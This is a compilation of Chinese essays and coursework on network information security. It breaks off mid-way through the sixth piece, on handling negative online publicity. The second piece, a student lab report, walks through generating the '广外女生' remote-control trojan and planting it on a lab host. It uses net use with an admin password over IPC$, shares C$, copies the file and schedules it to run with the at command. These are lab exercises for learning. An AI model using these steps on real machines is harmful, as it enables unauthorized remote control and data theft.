信息网络论文

2024-06-24

信息网络论文(精选8篇)

篇1:信息网络论文

网络信息安全论文:

网络信息安全浅析

摘要:在当今社会,信息、物质、能源一起构成三大支柱资源,而其中的信息资源,对人们来说已不再陌生。随着社会的发展,信息越来越显得重要,信息是一种财富,对经济的繁荣、科技的进步,社会的发展都起着非常重要的作用。同样,对信息的保护也是一件很重要的工作。

关键词:信息资源;信息安全

1.网络信息安全概述

信息安全是指为建立信息处理系统而采取的技术上和管理上的安全保护,以实现电子信息的保密性、完整性、可用性和可控性。当今信息时代,计算机网络已经成为一种不可缺少的信息交换工具。然而,由于计算机网络具有开放性、互联性、连接方式的多样性及终端分布的不均匀性,再加上本身存在的技术弱点和人为的疏忽,致使网络易受计算机病毒、黑客或恶意软件的侵害。面对侵袭网络安全的种种威胁,必须考虑信息的安全这个至关重要的问题。

网络信息安全分为网络安全和信息安全两个层面。网络安全包括系统安全,即硬件平台、操作系统、应用软件;运行服务安全,即保证服务的连续性、高效率。信息安全则主要是指数据安全,包括数据加密、备份、程序等。

1.1 网络信息安全的内容

1.1.1 硬件安全。即网络硬件和存储媒体的安全。要保护这些硬设施不受损害,能够正常工作。

1.1.2 软件安全。即计算机及其网络中各种软件不被篡改或破坏,不被非法操作或误操作,功能不会失效。不被非法复制。

1.1.3 运行服务安全。即网络中的各个信息系统能够正常运行并能正常地通过网络交流信息。通过对网络系统中的各种设备运行状况的监测,发现不安全因素能及时报警并采取措施改变不安全状态,保障网络系统正常运行。

1.1.4 数据安全。即网络中存储及流通数据的安全。要保护网络中的数据不被篡改、非法增删、复制、解密、显示、使用等。它是保障网络安全最根本的目的。

2.1 网络信息安全的目标

2.1.1 保密性。保密性是指信息不泄露给非授权人,或供其使用的特性。

2.1.2 完整性。完整性是指信息未经授权不能被修改、不被破坏、不被插入、不迟延、不乱序和不丢失的特性。对网络信息安全进行攻击的最终目的就是破坏信息的完整性。

2.1.3 可用性。可用性是指合法用户访问并能按要求顺序使用信息的特性,即保证合法用户在需要时可以访问到信息。

2.1.4 可控性。可控性是指授权机构对信息的内容及传播具有控制的能力的特性,可以控制授权范围内的信息流向以及方式。

2.1.5 可审查性。在信息交流过程结束后,通信双方不能抵赖曾经做出的行为,也不能否认曾经接收到对方的信息。

2.我国信息化中的信息安全问题

近年来,随着国家宏观管理和支持力度的加强、信息安全技术产业化工作的继续进行、对国际信息安全事务的积极参与以及关于信息安全的法律建设环境日益完善等因素,我国在信息安全管理上的进展是迅速的。但是,由于我国的信息化建设起步较晚,相关体系不完善,法律法规不健全等诸多因素,我国的信息化仍然存在不安全问题。

2.1 信息与网络安全的防护能力较弱。我国的信息化建设发展迅速,各个企业纷纷设立自己的网站,特别是“政府上网工程”全面启动后,各级政府已陆续设立了自己的网站。但是由于许多网站没有防火墙设备、安全审计系统、入侵监测系统等防护设备,整个系统存在着相当大的信息安全隐患。根据有关报告称,在网络黑客攻击的国家中,中国是最大的受害国。

2.2 我国基础信息产业薄弱,核心技术严重依赖国外,缺乏自主创新产品,尤其是信息安全产品。我国信息网络所使用的网管设备和软件基本上来自国外,这使我国的网络安全性能大大减弱。被认为是易窥视和易打击的“玻璃网”。由于缺乏自主技术,我国的网络处于被窃听、干扰、监视和欺诈等多种信息安全威胁中,网络安全处于极脆弱的状态。

2.3 信息犯罪在我国有快速发展趋势。除了境外黑客对我国信息网络进行攻击,国内也有部分人利用系统漏洞进行网络犯罪,例如传播病毒、窃取他人网络银行账号密码等。

2.4 在研究开发、产业发展、人才培养、队伍建设等方面与迅速发展的形势极不适应。

由于我国的经济基础薄弱,在信息产业上的投入还是不足,特别是在核心技术及安全产品的开发生产上缺少有力的资金支持和自主创新意识。其次,全民信息安全意识淡薄,警惕性不高。大多数计算机用户都曾被病毒感染过,并且病毒的重复感染率相当高。

除此之外,我国目前信息技术领域的不安全局面,也与西方发达国家对我国的技术输出进行控制有关。

3.解决措施

针对我国网络信息安全存在的问题,要实现信息安全不但要靠先进的技术,还要有严格的法律法规和信息安全教育。

3.1 加强全民信息安全教育,提高警惕性。有效利用各种信息安全防护设备,保证个人的信息安全,提高整个系统的安全防护能力,从而促进整个系统的信息安全。

3.2 发展有自主知识产权的信息安全产业,加大信息产业投入。增强自主创新意识,加大核心技术的研发,尤其是信息安全产品,减小对国外产品的依赖程度。

3.3 创造良好的信息化安全支撑环境。完善我国信息安全的法规体系,制定相关的法律法规,加大对网络犯罪和信息犯罪的打击力度,对其进行严厉的惩处。

3.4 高度重视信息安全基础研究和人才的培养。为了在高技术环境下发展自主知识产权的信息安全产业,应大力培养信息安全专业人才,建立信息安全人才培养体系。

3.5 加强国际防范,创造良好的安全外部环境。必须积极参与国际合作,通过吸收和转化有关信息网络安全管理的国际法律规范,加强信息网络安全。

4、结束语

随着网络和计算机技术日新月异地飞速发展,新的安全问题不断产生和变化。因此网络信息的安全必须依靠不断创新的技术进步与应用、自身管理制度的不断完善和加强、网络工作人员素质的不断提高等措施来保障。同时要加快网络信息安全技术手段的研究和创新,从

而使网络的信息能安全可靠地为广大用户服务。

篇2:信息网络论文

一、实验目的及要求

该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。

本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。

二、专周内容

1、安全需求分析

(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:

A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理

(2)解决网络安全问题的一些要求

A、大幅度地提高系统的安全性(重点是可用性和可控性);

B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;

C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;

D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;

E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;

F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;

(3)系统安全目标

A、建立一套完整可行的网络安全与网络管理策略;

B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;

C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;

D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;

E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;

F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;

2、网络拓扑

3、网络安全的基本内容

(1)基本网络命令

A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。

B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:

C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%

(2)操作系统安全

A、屏蔽不需要的服务组件

开始——程序——管理工具——服务 出现以下窗口:

然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”

(3)数据库系统安全

A、使用安全的帐号策略和Windows认证模式

由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。

SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。

Windows认证模式比混合模式更优越,原因在以下:

1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。

2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。

3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。

4)Windows认证意味着你只需要将密码存放在一个地方。

要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装

1.具体操作如下:

第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;

第二步:

在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;

第三步: 在“软件许可协议”对话框,接受协议点击“是”;

第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;

第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;

第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;

第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;

第八步: 单击“下一步”按钮,系统开始复制文件;

第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。

相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。

点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:

网络监控中心:

(5)网络攻击工具:“广外女生”

它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。

主要步骤:首先运行“gwg.exe”,出现如图窗口:

选中“服务端设置”,生成“GDUFS.exe”木马:

然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:

“开始”——“运行”——“cmd”

命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系

命令:net time 191.168.12.38 获取目标主机的时间

命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道

命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:

命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。

三、专周小结:

通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。

网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。

网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。

至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:

1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。

2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。

4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。

篇3:论网络信息安全的信息管理

计算机网络信息管理是指以信息技术为载体, 以信息服务为对象, 融入计算机网络信息分布、储存、利用、服务的全过程。可以说, 保证网络信息安全是促进信息管理的前提, 在计算机网络信息管理中占有举足轻重的地位。笔者结合自身工作实践, 在本文中阐述了网络信息安全管理的概念及分类, 分析了当前网络信息的安全问题, 提出了进一步加强信息管理的对策措施, 以期对网络信息安全管理有所借鉴帮助。

1 网络信息安全管理的概念及分类

1.1 基础运行信息

所谓基础运行信息, 是网络信息管理工作的基本对象, 也是整个计算机网络信息的基础。基础运行信息主要指计算机网络IP地址、域名以及自治系统号等三类。可以说, 不管什么类型的计算机网络信息实现多元发展, 都必须以基础运行信息为基础和前提。

1.2 服务器信息

所谓服务器信息, 是与服务器运行密切相关的信息, 全面服务于计算机网络信息服务供给的全过程, 是检验计算机服务器运行质量和效率的最关键因素。计算机服务器信息主要包括基本配置参数、负载均衡指标、访问指标等。

1.3 用户信息

所谓用户信息, 是计算机用户身份的证明。计算机用户信息主要包括:用户姓名、用户部门、用户职位及权责等相关资料数据。

1.4 网络信息资源

所谓网络信息资源, 是计算机在为用户提供网络信息服务过程中, 所产生的信息资源。由于计算机网络结构的特殊性, 网络信息资源呈现出分散式、非线性式的特点, 这句导致网络信息资源在传输过程中, 会存在较多的安全隐患, 有被不安全信息介入的危险, 这需要引起广大计算机用户的密切关注。

2 当前网络信息安全问题分析

实践证明, 计算机网络信息管理中主要存在以下两种安全问题, 一种是信息安全检测, 这种问题是针对网络信息管理的完整性而言的;一种是信息访问控制问题, 这种问题是针对网络信息管理认证性和保密性而言的。

2.1 信息安全监测

科学的进行信息安全监测, 可以有效消除计算机网络的脆弱性, 在很大程度上提高网络信息资源的开放程度, 同时, 可以使计算机信息管理人员在第一时间发现计算机信息安全存在的隐患问题, 及时查清问题原因, 预警处理被攻击对象, 保证计算机网络信息系统中的关键程序、关键数据不被侵染, 确保网络信息的安全可靠。

2.2 信息访问控制问题

信息访问控制问题, 是计算机网络信息管理的核心所在。对于计算机网络信息资源的使用, 要严格信息控制访问要求, 使信息通信过程更加严密。也就是说, 计算机网络信息安全防护重点就是资源信息的发布过程和个人信息的储存过程。只有牢牢控制信息访问渠道, 才能从根本上保障计算机网络信息安全。

3 进一步加强信息管理的对策措施

3.1 强化思想认识, 健全完善制度

相关人员要进一步提升对计算机网络信息管理工作重要性的认识, 强化责任感和紧迫感。要根据所在单位的特点, 全面健全完善计算机信息管理制度, 切实规范如计算机应用管理、保密信息管理等工作。要建立网络安全应急预案, 为规范管理、确保安全夯实基础。同时, 要真正明确工作责任, 严格按照保密规定, 规范信息录入及发布流程, 及时消除信息管理安全隐患。要进行有针对性的教育培训, 及时组织开展计算机操作系统、网络知识、病毒防护等基本技能培训, 努力使计算机网络信息安全观念深入人心。

3.2 合理配置资源, 切实加强防范

一是要加强计算机病毒防护。要在中心服务器部上安装防毒、杀毒软件, 对内网、外网的客户端进行严格区分, 做好相关重要数据的备份工作。同时, 定期进行病毒扫描, 对于通过网络传输、邮件传输及移动介质接收的文件, 都可能携带病毒, 接收前要进行严格的扫描、查杀。二是要加强应急管理。要健全应急管理机制, 对出现的涉及网络信息安全的突发事件, 及时上报、处理, 查实原因、追究责任, 确保事件发生后把损失降到最低。三是要加强隔离管理。对内网、外网要通过物理方式或防火墙进行有效隔离, 保证防护外来攻击, 防止内、外网串联。

3.3 强化等级保护, 保障信息安全

要强化等级保护, 严格技术标准, 保障业务信息系统的安全。单位要成立专门的信息中心, 具体负责等级保护工作。信息安全基础设施要科学可靠, 强化信息系统运维管理, 有效提高系统的安全防护水平。同时, 要建立完善安全保护技术措施, 对网络、系统进行安全区域划分, 按照“水平分区、区内细分”的划分原则, 保证网络合理规划。要进一步加强制度建设和信息安全管理。严格本着“预防为主、建章立制, 加强管理、重在治本”的原则, 坚持管理与技术并重, 对信息安全工作的有效开展。起到了良好的规范作用。

3.4 落实专业措施, 确保安全运行

由于部分政府、高校、国企等计算机网络信息资源庞大, 所以可以采用专业性的解决方案来保护网络信息安全, 诸如: 运用网络门户网站保护解决方案, 从网络层、应用层到Web层, 对计算机网络信息进行全面防护。同时, 一些单位作为公共信息的提供者, 其网页经常被篡改、挂马, 这都大大影响了单位声誉。要使用防火墙、IDS/ IPS等, 具体来讲, 可以使用防火墙技术、代理服务器技术、入侵检测技术IDS、反病毒技术、认证技术、对信息进行加密等手段, 防止网页篡改、挂马。

4 总结

总而言之, 新形势下的计算机网络信息安全管理工作已经逐步迈向了系统化、集成化、多元化。但目前网络信息安全问题还比较突出, 只有强化思想认识, 健全完善制度;合理配置资源, 切实加强防范;强化等级保护, 保障信息安全;落实专业措施, 确保安全运行, 才能真正起到加强计算机网络信息安全防护的最终目的。

参考文献

[1]段盛.企业计算机网络信息管理系统可靠性探讨[J].《湖南农业大学学报:自然科学版》.2000 (26) :134-136.

[2]李晓琴;张卓容.医院计算机网络信息管理的设计与应用[J].《医疗装备》.2003 (16) :109-113.

[3]李晓红.妇幼保健信息计算机网络管理系统的建立与应用[J].《中国妇幼保健》.2010 (25) :156-158.

[4]罗宏俭.计算机网络信息技术在公路建设项目管理中的应用[J].《交通科技》.2009 (1) :120-125.

[5]刘永华.基于Agent的分布式入侵检测系统[J].《潍坊学院学报》.2006 (3) .

[6]蔡洪民;伍乃骇;滕少华.局域网络安全扫描系统的设计与实现[J].《微计算机应用》.2005 (1) :45-48.

[7]金洲.计算机网络安全的管理与技术[J].《现代营销》.2010 (4) :51-53

篇4:信息网络论文

关键词:信息安全高校教师素养

中图分类号:G64文献标识码:A文章编号:1007-3973(2010)012-161-02

随着计算机网络信息技术的快速发展,高校网络平台上建立的OA系统、邮件系统、精品课程网站等应用日益广泛,促进了教育教学的创新发展,使现代教育观念发生了转变,更有利于培养学生的自主学习能力、启发创新思维。计算机信息技术发展到今日,高校内面临的重要问题是怎样安全发挥技术教育化的效力,更好的为教学服务。但伴随而来的网络信息安全威胁也日渐严峻,信息系统安全,是指为信息处理系统建立所采取的技术和管理的安全保护措施,以保护计算机系统中、软件及数据,防止其因偶然或恶意的原因而使系统或信息遭到破坏、更改或泄露。高校网络中的试卷、题库、答案、科研项目成果、学生学籍等信息在都需要被良好地保护。一旦损坏,高校教师受到影响最大,责任重大,高校网络管理部门加强信息安全防范的同时,高校教师有必要提升网络信息安全的意识和技能,提升网络安全素养。

1高校网络信息安全威胁分析

高校网络系统中有实验设备,教学殴各,办公设备,学生终端等各种资产,受到的威胁有自然环境的,也有人为因素。高校网络是以TCP/IP协议为架构的局域网,TCP/IP系统由四层构成:数据链路层、网络层、传输层和应用层。每一层都可能受到威胁,操作系统是计算机系统应用软件的运行平台,是硬件设备的管家婆,安全威胁与操作系统密切相关,还有网络管理模式与安全威胁大有关联。下面从实体安全、网络通信安全、应用层安全、操作系统安全及网络管理安全进行分类描述。

1.1实体安全威胁

网络实体可能受到的威胁有:环境安全威胁、设备安全威胁、存储介质安全威胁。主要表现为:

(1)地震、水灾、火灾等不可抗拒灾害造成整个系统瘫痪。

(2)电力故障造成设备因断电而发生数据库信息丢失事故。

(3)被无线监听、设备被盗、被人为毁坏造成数据丢失或信息泄漏。

1.2网络通信安全威胁

网络通信可能受到的威胁有:局域网内部嗅探扫描、ARP病毒攻击、IP地址盗用、IP地址冲突、端口扫描威胁、伪造TCP包等。主要表现为:

(1)LAN中,黑客通过嗅探工具可以窃取通信信息。伪造ARP数据包,造成局域网瘫痪。

(2)IP地址是客户端在网络中的唯一标识,它是一个公共数据,可以在操作系统客户端直接修改数值,伪装成可信节点的IP地址,进行攻击。

(3)TCP/IP数据报文在网络中传输不需要进行身份验证,而且任何情况可以返回应答数据。黑客可以利用服务漏洞找到攻击入口。

1.3应用层安全威胁

应用层可能受到的威胁有:Web网页漏洞、E-mail服务漏洞、FTP漏洞、数据库安全隐患、盗版软件的泛滥、即时通讯工具如QQ、MSN、Skype等。主要表现有:

(1)非法篡改页面数据,感染页面病毒干扰其正常运行。

(2)E-mail办公已经成为高校一种方便、快捷的手段,利用邮件服务漏洞控制邮件发送会使用户陷入极大的危机。

(3)数据库中保存大量重要信息,如果口令被破解,将引起信息泄密。

(4)即时通讯工具往往成为流行病毒的载体,它们一旦感染就会迅速获得好友信息名单,进行扩散传播或自动弹出恶意窗口占用系统资源。

1.4操作系统安全威胁

操作系统由于设计的缺陷和代码开发的超大规模,即使拥有用户标识、身份认证、审计跟踪等安全功能,还是非常容易被攻击。主要表现有:

(1)系统配置不当会产生安全漏洞。如登录口令强度不够或者没有设置密码。重要文件的权限限制较低,系统重要资源长期暴露在网络上,会给有意入侵者提供方便。

(2)操作系统对外提供的一些网络相关服务,也会为入侵者提供机会获取系统访问权限,相当于远程操作主机,从而威胁用户信息安全。

1.5网络管理威胁

高校网络管理与网络性能维护是高校网络中心部门的职责所在,是网络信息安全中最重要的部分。可能的威胁有:内部网络结构意外泄露、管理员帐号口令泄露、内部员工恶意进行非法数据操作。

另外,高校人员相对集中,高校学生群体人数众多,网络设备众多,学生对网络新技术感到好奇,有强烈的实践的欲望,并敢于尝试,他们把自己校园网络环境做为了自己实验环境,干扰了高校网络的正常运转。高校的网络环境开放,内部用户使用网络资源繁多而杂乱,病毒发作率高,黑客入侵几率相对较大,高校的实验设各性能较高,是为满足研究需要而配备的,可同时也可能成为攻击者的利器。

2高校教师网络安全素养提升

面对各种网络信息安全威胁,高校教师从自身做起,积极加入到维护网络信息安全的队伍中,俗话说“防患于未然”。高校教师网络安全素养的提升,建议从以下几个方面着手:

(1)要提高高校教师对网络信息安全的认识。

(2)高校教师通过了解网络信息安全相关的法律法规,请法律做自己的护盾,同时也自我省身。如分级制度、过滤制度等,经常浏览网络信息安全知识网站,如中国计算机安全(http://www.infoscc.org.cn/)、国家计算机病毒应急处理中心(http://www.antivirus-china.org.cn/)。

(3)高校教师应意识到杀毒软件、防火墙、身份认证等都不是绝对安全可靠的,高校网络信息安全系统不可能永远安全对任何攻击都免疫。始终保持头脑清醒,关注计算机的异常情况,及时维护计算机的性能。才能有效地应对各种网络安全攻击。

(4)高校教师意识到网络信息安全重要性的同时,要不断提高自己网络信息安全技术水平。对高校教师进行网络安全技能培训,包括防火墙技术、身份认证技术、入侵检测技术、防病毒技术等。

(5)计算机网络作为高校教师教育教学重要工具,高校教师应培养良好的使用计算机网络的习惯。

1)数据安全备份,对重要的数据信息定期进行外存备份,最大限度减小硬盘损坏带来的损失。

2)加强防范,对病毒库要及时更新,定期进行病毒的全盘查杀。

3)使用正版软件,不要打开不明程序。很多黑客把病毒程序写入用户常用的软件中,所以一定要使用标准行业软件。

4)网页和邮箱。对网页风险进行监控,发送邮件尽量加密。

5)密码。系统密码,帐号密码等不可使用身份证号码、出生日期、手机电话号码、包括家人的。养成定期更换重要密码的习惯。

6)一旦发生信息安全事故,不可自己任意修复,以免误操作造成不可挽回的局面。可请网络信息安全专业人员来帮忙。

高校教师通过加强网络信息安全培训,与时俱进增强自己的网络信息安全水平,善用网络技术与网络资源,使高校网络成为自己的教学工作的得力助手。

3结语

篇5:信息网络论文

一、基本说明

1模块:高中信息技术基础

2年级:高中一年级

3所用教材版本:上海科技教育出版社

4所属的章节:第二章第三节

5学时数:45分钟(机房授课)

二、教学设计

1、教学目标:了解网络信息检索的几种常用方法;掌握利用搜索引擎获取网络信息的策略与技巧;能够根据问题确定信息的需求与,并选择适当的方法获取信息。

2、内容分析:本课是《信息技术基础》(必修)第二章第三节的内容,旨在培养和提升学生获取网络信息的能力,使其成为每位学生在信息社会必须掌握的生存技能,并为学生学会有效组织和处理信息奠定基础,是学生继续学习和不断发展的不竭动力。本节强调通过体验和感悟网络信息活动中的操作与应用,培养学生掌握利用网络获取信息的过程和方法,为学生的学习、生活和发展提供服务。另外,本节还注意引导学生形成自主学习意识、与他人合作意识,也为必修模块的其他章节和各选修模块开展多元化交流与合作奠定基础。

3、学情分析:学生已有使用网络检索信息的感性经验,老师要结合学生原有的认知基础加以归纳提升,使学生形成多网络信息检索的理性认识,并在实践中不断总结积累自己利用网络检索信息的经验,不断提高自己的网络信息检索水平。但是学生之间的差异比较大,老师要注意营造交流学习的氛围。

4、设计思路:由问题“你知道有关中秋节的传说故事吗?”引出利用网络获取信息的学习任务,在学生交流探究并实践的基础上,让先查到的同学汇报自己的检索结果和所使用的方法,带动全班同学的学习积极性和学习兴趣,一起参与到课堂教学中来,师生一起用探究学习和交流学习的方式总结出常用网络信息搜索的方法。

在此基础上进一步引导学生学习常用信息检索方法——关键词查询法,掌握关键词的提炼和组合,然后通过抢答比赛让学生去体会和总结网络信息检索的策略与技巧。

中国的传统节日形式多样,内容丰富,是我们中华民族悠久历史文化的一个组成部分。最后让学生综合运用本节所掌握的网络信息检索策略与技巧全面了解中国重大传统节日的相关文化,以此来增进学生对传统文化的了解和继承。

三、教学过程

教学环节及时间

教师活动

学生活动

对学生学习过程的观察和考查及设计意图

创设情境问题引入

3’

播放不到一分钟的中秋送月饼的flash动画片,然后引出话题:农历八月十五日,是我国传统的中秋节,也是我国仅次于春节的第二大传统节日。那么你知道中秋节有哪些传说故事吗?

学生回答

激发学生兴趣,让学生很快进入信息技术的课堂氛围。

课程实施

37’

5’

组成员之间交流探讨,试一试如何利用因特网查询中秋节的传说故事?

老师巡回

老师带领大家总结出常用的网络信息检索方法:

1、目录检索

2、关键词查询

、学生小组探索。

2、先查到的同学汇报自己的检索结果和所使用的方法

根据学生的探索了解学生已有的网络信息检索水平

7’

以上两类信息搜索方法中我们平时用的最多的是哪一类方法?你知道为什么吗?这两种信息检索法有什么区别?

在学生归纳的基础上,老师总结出两种信息检索方法的特点:

查询方式

比较项目

分类检索服务网站

关键词查询服务网站

实现方式

分类目录

搜索引擎

操作方式

层层点击

输入关键词

优点

得到比较系统的信息

得到具体的信息

缺点

难以准确找到具体信息

不适合找到系统的信息

、学生回答。

2、学生归纳比较两种信息检索方法。

培养学生归纳总结能力。

9’

老师读完题目后,小组成员分别利用不同的网络信息检索方法查询问题答案,先查到的,举手示意,经老师同意后汇报自己的查询结果。

答对者,给所在小组加十分,抢答答错者(包括抢答不遵守规则者)扣十分,其他小组继续抢答。整个比赛结束时得分最高组为优胜组。

学生检索问题答案进行抢答。、结合活动开展,巩固信息检索方法的使用,利于学生掌握新知。

2、通过分组活动培养学生的团结协作精神。

7’

小组成员之间交流比赛过程中自己利用网络搜索信息的体会,想一想如何才能使用搜索引擎准确快速地找到自己需要的信息,并推举小组代表总结发言。

师生共同总结出搜索引擎的使用技巧:

1、关键词的选择最重要。

(1)提炼关键词

(2)组合关键词

用布尔运算符组合关键词:

AND或“+”、空格

oR或“|”

NoT或“-”

2、不要局限于一个搜索引擎。

3、强制检索的方法——加英文双引号。如查询谚语“raincatsanddogs”的汉语意思。加英文双引号可大大提高搜索的速度和准确率。

、小组交流。

2、推举代表总结。、培养学生探究学习的能力。

2、培养学生归纳总结能力。

9’

背景:

保护好属于中华民族的传统节日,是我们的一种责任!在我国已经延续了几千年的传统民间节日端午节,却于XX年被韩国抢先申报为该国文化遗产。在各种洋节日益盛行的今天,端午节等传统节日日渐式微。

中国的传统节日形式多样,内容丰富,是我们中华民族悠久历史文化的一个组成部分。

请结合小组抽到的信息检索题目,查查相关中国传统节日的来历、习俗、传说、诗词并与同学交流。

请推举小组代表介绍:

小组查询的是关于中国哪个传统节日的内容?

具体查询方法是:

查询结果如何?

学生根据抽到的题目进行信息检索。

通过该环节对中国各传统节日相关文化的搜索,来加强学生对民族文化的认识和继承,树立起对民族文化的珍惜与爱护之情。

拓展

1’

不管是从因特网获取信息还是从其他途径获取信息,必须保证获取信息的途径和方法是合法的,严禁不合法的信息获取行为——偷窃国家或单位机密信息;运用偷拍、窃听等手段侵犯他人隐私;使用威胁或黑客入侵手段等。

使学生知道在使用网络的过程中,应该遵纪守法,自觉抵制不良信息,负责任的参与信息实践,养成良好的网络道德行为和习惯。

总结

4’

让学生谈本节课的收获,老师补充。

学生一起回答

回顾本课,对所学作总结,学生再回忆一遍,加深印象

四、教学反思

采取这种主题活动式教学,对教师的要求更高。要想组织好一堂课,教师必须精心设计课堂,把活动安排得更细致,并要考虑周全。最重要的是要引起学生的极大兴趣,这就需要教师有非常好的引导,并在过程中给予学生帮助与指导。要有随机应变、驾驭课堂的能力,能调动气氛。当要各小组讨论时,要能及时调动学生积极参与,教师巡视时发现学生的闪光点及时进行肯定与表扬,进而带动整个课堂的气氛。课堂设定的评价机制要明确,活动要达成的目标要明确。

篇6:信息网络论文

很多营销/公关人员在看到企业负面消息后,第一时间想到的是如何把这个消息给删了,其实这种方法是大错特错。首先这是国家相关法律所不允许的,其次消息已经传出去,就难以收回来了,即使没有想过文字信息流传,大家还是会口口相传。那营销/公关人员正确面对网络负面信息的处理流程是怎么样的呢?长沙乐客网络公关公司建议营销/公关人员按照以下方法处理网络负面信息: 第一、心平气和、冷静对待

保持冷静的头脑,心平气和的去面对负面信息,研究负面内容,找到消费者发布负面信息的动机和缘由,正确的解决所存在的问题。如果这个问题真的存在,那就应该向消费者道歉,从道德层面和思想上得到消费者们的理解和宽容,毕竟世界上是没有完美的产品和服务的,并且要找到解决这个问题的方法,向所有的消费者保证这样的错误以后不再出现。

如果这个问题不存在,那就是消费者对产品或者服务理解有误所造成的,企业营销/公关人员首先要感谢消费者对公司产品或者服务的关注,并向消费者做出正确的引导,消费者在得到应有尊重的同时也会进一步增强对企业的好感,企业也会赢得其他消费者的尊重。

第二、负面压制、游刃有余

这个时候对负面信息的压制,有一定的必要性和合理性。必要性是因为,负面的信息都会或多或少的对部分不明真相的消费者造成误导,所以进行负面信息的压制可以减少这种情况发生的可能性,而合理性在于,已经有过之前的处理措施,这个时候的负面信息压制并不是企业营销人员逃避问题的做法,而是对负面信息的善后工作,这个时候企业营销/公关人

